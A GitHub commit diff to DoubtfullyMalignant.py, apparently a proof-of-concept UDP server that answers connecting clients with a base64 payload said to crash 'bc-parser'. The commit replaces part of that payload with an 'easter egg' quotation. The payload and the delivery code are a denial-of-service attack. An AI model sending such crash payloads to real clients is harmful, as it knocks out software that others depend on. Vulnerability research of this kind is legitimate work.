Skip to content

Commit 7ba8c10

Browse files
author
David Davidson
authored
Update DoubtfullyMalignant.py
1 parent fd844a4 commit 7ba8c10

File tree

1 file changed

+5
-4
lines changed

1 file changed

+5
-4
lines changed

DoubtfullyMalignant/DoubtfullyMalignant.py

Lines changed: 5 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -56,10 +56,11 @@ def PointlessASCIIBanner():
5656

5757
class DoubtfullyMalignant(socketserver.BaseRequestHandler):
5858
def handle(self):
59-
# boom is a 110 byte response that kills bc-parser
60-
boom = "AQAAAAAAAAAAAAAAAAAAAIRZpwZtOxAAAgAAAHhWNBJ4VjQSeFY0Enh"
61-
boom += "WNBJ4VjQSeFY0EnhWNBJ4VjQSAAAAAAAAAADU2CEAAgAAADw8PDzMzM"
62-
boom += "zMmQAAAKWlpaWEAAAAAAAAAAAAAADt/q3eAAA="
59+
# boom is a 110 byte response that kills bc-parser.
60+
# May contain easter eggs.
61+
boom = "QmVpbmcgY2FsbGVkIGEgdHJhaXRvciBieSBEaWNrIENoZW5leSBpcyB0"
62+
boom += "aGUgaGlnaGVzdCBob25vdXIgeW91IGNhbiBnaXZlIGFuIEFtZXJpY2F"
63+
boom += "umQAAAKWlpaWEAAAAAAAAAAAAAADt/q3eAAA="
6364
sock = self.request[1]
6465
print "{+} Handling connection from %s" %(self.client_address[0])
6566
sock.sendto(boom.decode("base64"), self.client_address)

0 commit comments

Comments
 (0)